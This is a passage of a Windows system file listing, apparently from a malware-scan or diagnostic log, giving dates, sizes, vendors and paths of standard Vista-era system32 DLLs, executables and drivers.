2009-09-24 10:14 - 2009-04-11 00:32 - 000438744 _____ (Microsoft Corporation) C:\Windows\system32\mcupdate_GenuineIntel.dll
2009-09-24 10:14 - 2009-04-11 00:32 - 000223208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2009-09-24 10:14 - 2009-04-11 00:28 - 003217408 _____ (Microsoft Corporation) C:\Windows\system32\WinSAT.exe
2009-09-24 10:14 - 2009-04-11 00:28 - 003174400 _____ (Microsoft Corporation) C:\Windows\system32\netshell.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 002012160 _____ (Microsoft Corporation) C:\Windows\system32\milcore.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001856512 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001788416 _____ (Microsoft Corporation) C:\Windows\system32\d3d9.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001730560 _____ (Microsoft Corporation) C:\Windows\system32\apds.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001591296 _____ (Microsoft Corporation) C:\Windows\system32\setupapi.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001589248 _____ (Microsoft Corporation) C:\Windows\system32\msjet40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001576960 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001524736 _____ (Microsoft Corporation) C:\Windows\system32\WindowsAnytimeUpgradeCPL.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001480704 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001459200 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001381376 _____ (Microsoft Corporation) C:\Windows\system32\Query.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001324032 _____ (Microsoft Corporation) C:\Windows\system32\browseui.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001216000 _____ (Microsoft Corporation) C:\Windows\system32\AuxiliaryDisplayCpl.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001209856 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001112064 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001086464 _____ (Microsoft Corporation) C:\Windows\system32\NetProjW.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001078784 _____ (Microsoft Corporation) C:\Windows\system32\diagperf.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001077248 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001055232 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
2009-09-24 10:14 - 2009-04-11 00:28 - 001053696 _____ (Microsoft Corporation) C:\Windows\system32\msdtctm.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 001017856 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000978432 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000968192 _____ (Microsoft Corporation) C:\Windows\system32\wcnwiz2.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000950784 _____ (Microsoft Corporation) C:\Windows\system32\gpedit.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000928768 _____ (Microsoft Corporation) C:\Windows\system32\scavenge.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\RacEngn.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000805376 _____ (Microsoft Corporation) C:\Windows\system32\NaturalLanguage6.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000758784 _____ (Microsoft Corporation) C:\Windows\system32\qmgr.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000754688 _____ (Microsoft Corporation) C:\Windows\system32\propsys.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000677376 _____ (Microsoft Corporation) C:\Windows\system32\imapi2fs.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000670720 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000644608 _____ (Microsoft Corporation) C:\Windows\system32\p2psvc.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000643072 _____ (Microsoft Corporation) C:\Windows\system32\msrepl40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000627712 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000618496 _____ (Microsoft Corporation) C:\Windows\system32\mswstr10.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000613888 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL
2009-09-24 10:14 - 2009-04-11 00:28 - 000582144 _____ (Microsoft Corporation) C:\Windows\system32\SLCommDlg.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000558080 _____ (Microsoft Corporation) C:\Windows\system32\sysmain.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000550400 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000524288 _____ (Microsoft Corporation) C:\Windows\system32\sqlsrv32.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000483328 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000478208 _____ (Microsoft Corporation) C:\Windows\system32\DevicePairing.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000469504 _____ (Microsoft Corporation) C:\Windows\system32\newdev.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000466944 _____ (Microsoft Corporation) C:\Windows\system32\riched20.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000454656 _____ (Microsoft Corporation) C:\Windows\system32\msxbde40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000454144 _____ (Microsoft) C:\Windows\system32\IasMigPlugin.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000409600 _____ (Microsoft Corporation) C:\Windows\system32\msexch40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000407552 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000406528 _____ (Microsoft Corporation) C:\Windows\system32\msvcp60.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000378368 _____ (Microsoft Corporation) C:\Windows\system32\imapi2.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000368640 _____ (Microsoft Corporation) C:\Windows\system32\mspbde40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\SLUI.exe
2009-09-24 10:14 - 2009-04-11 00:28 - 000351744 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000344064 _____ (Microsoft Corporation) C:\Windows\system32\msrd3x40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000339968 _____ (Microsoft Corporation) C:\Windows\system32\msexcl40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000327168 _____ (Microsoft Corporation) C:\Windows\system32\P2PGraph.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000324608 _____ (Microsoft Corporation) C:\Windows\system32\sdohlp.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000319488 _____ (Microsoft Corporation) C:\Windows\system32\msrd2x40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000302592 _____ (Microsoft Corporation) C:\Windows\system32\QAGENTRT.DLL
2009-09-24 10:14 - 2009-04-11 00:28 - 000301568 _____ (Microsoft Corporation) C:\Windows\system32\srchadmin.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000293376 _____ (Microsoft Corporation) C:\Windows\system32\photowiz.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\WscEapPr.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000290816 _____ (Microsoft Corporation) C:\Windows\system32\msjtes40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000289792 _____ (Microsoft Corporation) C:\Windows\system32\spinstall.exe
2009-09-24 10:14 - 2009-04-11 00:28 - 000282624 _____ (Microsoft Corporation) C:\Windows\system32\mstext40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000268800 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000250368 _____ (Microsoft Corporation) C:\Windows\system32\wevtapi.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000241664 _____ (Microsoft Corporation) C:\Windows\system32\msltus40.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000228352 _____ (Microsoft Corporation) C:\Windows\system32\SLC.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000203264 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000203264 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\sperror.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000183808 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000165376 _____ (Microsoft Corporation) C:\Windows\system32\WcnNetsh.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000164352 _____ (Microsoft Corporation) C:\Windows\system32\spwizui.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000163840 _____ (Microsoft Corporation) C:\Windows\system32\wevtutil.exe
2009-09-24 10:14 - 2009-04-11 00:28 - 000160768 _____ (Microsoft Corporation) C:\Windows\system32\spoolss.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000143872 _____ (Microsoft Corporation) C:\Windows\system32\korwbrkr.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000136192 _____ (Microsoft Corporation) C:\Windows\system32\nlhtml.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000120320 _____ (Microsoft Corporation) C:\Windows\system32\EhStorAPI.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000119296 _____ (Microsoft Corporation) C:\Windows\system32\iasrecst.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000117248 _____ C:\Windows\system32\EhStorAuthn.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\AuxiliaryDisplayDriverLib.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000114176 _____ (Microsoft Corporation) C:\Windows\system32\EhStorShell.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\spreview.exe
2009-09-24 10:14 - 2009-04-11 00:28 - 000102912 _____ (Microsoft Corporation) C:\Windows\system32\AuxiliaryDisplayServices.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\fdBth.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000087040 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000071680 _____ (Microsoft Corporation) C:\Windows\system32\propdefs.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\slwmi.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000061440 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\xmlfilter.dll
2009-09-24 10:14 - 2009-04-11 00:28 - 000037376 _____ (Microsoft Corporation) C:\Windows\system32\EhStorPwdMgr.dll
2009-09-24 10:14 - 2009-04-11 00:27 - 002926592 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 002092544 _____ (Microsoft Corporation) C:\Windows\system32\dfsr.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 001792512 _____ (Microsoft Corporation) C:\Windows\system32\mmc.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000950272 _____ (Microsoft Corporation) C:\Windows\system32\mblctr.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000710144 _____ (Microsoft Corporation) C:\Windows\system32\Magnify.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000640512 _____ (Microsoft Corporation) C:\Windows\system32\bthprops.cpl
2009-09-24 10:14 - 2009-04-11 00:27 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\IasMigReader.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000441344 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000205824 _____ (Microsoft Corporation) C:\Windows\system32\eudcedit.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000185344 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000167424 _____ (Microsoft Corporation) C:\Windows\system32\PresentationSettings.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2009-09-24 10:14 - 2009-04-11 00:27 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\compcln.exe
2009-09-24 10:14 - 2009-04-11 00:22 - 000883712 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME
2009-09-24 10:14 - 2009-04-10 22:48 - 000344698 _____ C:\Windows\system32\eaphost.tmf
2009-09-24 10:14 - 2009-04-10 22:43 - 000442788 _____ C:\Windows\system32\dot3.tmf
2009-09-24 10:14 - 2009-04-10 22:43 - 000392170 _____ C:\Windows\system32\onex.tmf
2009-09-24 10:14 - 2009-04-10 22:42 - 000561152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hdaudbus.sys
2009-09-24 10:14 - 2009-04-10 22:42 - 000065536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2009-09-24 10:14 - 2009-04-10 22:14 - 000225280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2009-09-24 10:14 - 2009-04-10 20:52 - 000684032 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spsys.sys
2009-09-24 10:14 - 2009-04-10 19:59 - 000107612 _____ C:\Windows\system32\StructuredQuerySchema.bin
2009-09-24 10:14 - 2009-04-10 19:54 - 003662128 _____ C:\Windows\system32\locale.nls
2009-09-24 10:14 - 2009-03-06 19:11 - 000130008 _____ C:\Windows\system32\systemsf.ebd
2009-09-24 10:14 - 2009-02-19 18:20 - 000009239 _____ C:\Windows\system32\spcinstrumentation.man
2009-09-24 10:14 - 2009-02-18 12:39 - 000779136 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
2009-09-24 10:13 - 2009-04-11 00:33 - 000292840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgrx.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000527848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000265688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000190424 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fltMgr.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000180712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000161752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msrpc.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000149480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000125928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000122344 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Storport.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000109032 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ataport.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000099816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2009-09-24 10:13 - 2009-04-11 00:32 - 000053736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000053224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\termdd.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000050664 _____ (Microsoft Corporation) C:\Windows\system32\PSHED.DLL
2009-09-24 10:13 - 2009-04-11 00:32 - 000048104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mup.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000043496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pciidex.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000035304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\crashdmp.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000027624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Dumpata.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000027112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msahci.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000019944 _____ (Microsoft Corporation) C:\Windows\system32\kdusb.dll
2009-09-24 10:13 - 2009-04-11 00:32 - 000019944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\atapi.sys
2009-09-24 10:13 - 2009-04-11 00:32 - 000017896 _____ (Microsoft Corporation) C:\Windows\system32\kd1394.dll
2009-09-24 10:13 - 2009-04-11 00:32 - 000017384 _____ (Microsoft Corporation) C:\Windows\system32\kdcom.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 002205184 _____ (Microsoft Corporation) C:\Windows\system32\SyncCenter.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 002167808 _____ (Microsoft Corporation) C:\Windows\system32\mmcndmgr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001823744 _____ (Microsoft Corporation) C:\Windows\system32\pnidui.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001671680 _____ (Microsoft Corporation) C:\Windows\system32\chsbrkr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001575936 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2009-09-24 10:13 - 2009-04-11 00:28 - 001541120 _____ (Microsoft Corporation) C:\Windows\system32\onex.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001533440 _____ (Microsoft Corporation) C:\Windows\system32\wcnwiz.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001502720 _____ (Microsoft Corporation) C:\Windows\system32\certmgr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001382912 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2009-09-24 10:13 - 2009-04-11 00:28 - 001342464 _____ (Microsoft Corporation) C:\Windows\system32\brcpl.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001143296 _____ (Microsoft Corporation) C:\Windows\system32\wercon.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 001107968 _____ (Microsoft Corporation) C:\Windows\system32\pidgenx.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 001020928 _____ (Microsoft Corporation) C:\Windows\system32\wdc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000996352 _____ (Microsoft Corporation) C:\Windows\system32\WMNetMgr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000971264 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000869888 _____ (Microsoft Corporation) C:\Windows\system32\printui.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000860160 _____ (Microsoft Corporation) C:\Windows\system32\WerFaultSecure.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000856064 _____ (Microsoft Corporation) C:\Windows\system32\mswdat10.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000852992 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000759296 _____ (Microsoft Corporation) C:\Windows\system32\ipsecsnp.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000757248 _____ (Microsoft Corporation) C:\Windows\system32\azroles.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000638976 _____ (Microsoft Corporation) C:\Windows\system32\Utilman.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000633856 _____ (Microsoft Corporation) C:\Windows\system32\CertEnrollUI.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000593408 _____ (Microsoft Corporation) C:\Windows\system32\comuid.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000592896 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000564224 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000560640 _____ (Microsoft Corporation) C:\Windows\system32\msdtcprx.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000551936 _____ (Microsoft Corporation) C:\Windows\system32\prnntfy.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000507904 _____ (Microsoft Corporation) C:\Windows\system32\vdsdyn.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000485888 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000453120 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000450560 _____ (Microsoft Corporation) C:\Windows\system32\comdlg32.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\dsound.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000413696 _____ (Microsoft Corporation) C:\Windows\system32\wcncsvc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000399360 _____ (Microsoft Corporation) C:\Windows\system32\wlangpui.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000396288 _____ (Microsoft Corporation) C:\Windows\system32\ipsmsnap.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000391680 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000385536 _____ (Microsoft Corporation) C:\Windows\system32\vds.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000378368 _____ (Microsoft Corporation) C:\Windows\system32\devmgr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000368640 _____ C:\Windows\system32\msjetoledb40.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000364032 _____ (Microsoft Corporation) C:\Windows\system32\IPSECSVC.DLL
2009-09-24 10:13 - 2009-04-11 00:28 - 000342528 _____ (Microsoft Corporation) C:\Windows\system32\zipfldr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000340992 _____ (Microsoft Corporation) C:\Windows\system32\RelMon.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2009-09-24 10:13 - 2009-04-11 00:28 - 000324096 _____ (Microsoft Corporation) C:\Windows\system32\untfs.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000323584 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000314368 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000311808 _____ (Microsoft Corporation) C:\Windows\system32\swprv.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000310272 _____ (Microsoft Corporation) C:\Windows\system32\mtxclu.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000287744 _____ (Microsoft Corporation) C:\Windows\system32\Wldap32.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\rasapi32.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000282624 _____ (Microsoft Corporation) C:\Windows\system32\w32time.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000274432 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000273920 _____ (Microsoft Corporation) C:\Windows\system32\wow32.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000252928 _____ (Microsoft Corporation) C:\Windows\system32\iassdo.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000244224 _____ (Microsoft Corporation) C:\Windows\system32\wisptis.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000242176 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000223744 _____ (Microsoft Corporation) C:\Windows\system32\wscntfy.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000223232 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000222720 _____ (Microsoft Corporation) C:\Windows\system32\umpnpmgr.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000217088 _____ (Microsoft Corporation) C:\Windows\system32\WerFault.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000216064 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000204288 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000199168 _____ (Microsoft Corporation) C:\Windows\system32\adsldpc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\SndVol.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000194560 _____ (Microsoft Corporation) C:\Windows\system32\offfilt.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000182272 _____ (Microsoft Corporation) C:\Windows\system32\iassam.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000181760 _____ (Microsoft Corporation) C:\Windows\system32\pnpsetup.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000180224 _____ (Microsoft Corporation) C:\Windows\system32\scrobj.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000179712 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000171008 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000158208 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000153088 _____ (Microsoft Corporation) C:\Windows\system32\fundisc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000150528 _____ (Microsoft Corporation) C:\Windows\system32\MMDevAPI.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000150528 _____ (Microsoft Corporation) C:\Windows\system32\iasnap.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\spp.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\wusa.exe
2009-09-24 10:13 - 2009-04-11 00:28 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc6.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000126976 _____ (Microsoft Corporation) C:\Windows\system32\wersvc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000122368 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000115712 _____ (Microsoft Corporation) C:\Windows\system32\WinSCard.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000114688 _____ (Microsoft Corporation) C:\Windows\system32\odbccp32.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000108544 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\imapi.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000107008 _____ (Microsoft Corporation) C:\Windows\system32\regsvc.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000103936 _____ (Microsoft Corporation) C:\Windows\system32\sysclass.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\ulib.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000091648 _____ (Microsoft Corporation) C:\Windows\system32\IPHLPAPI.DLL
2009-09-24 10:13 - 2009-04-11 00:28 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\msctfp.dll
2009-09-24 10:13 - 2009-04-11 00:28 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
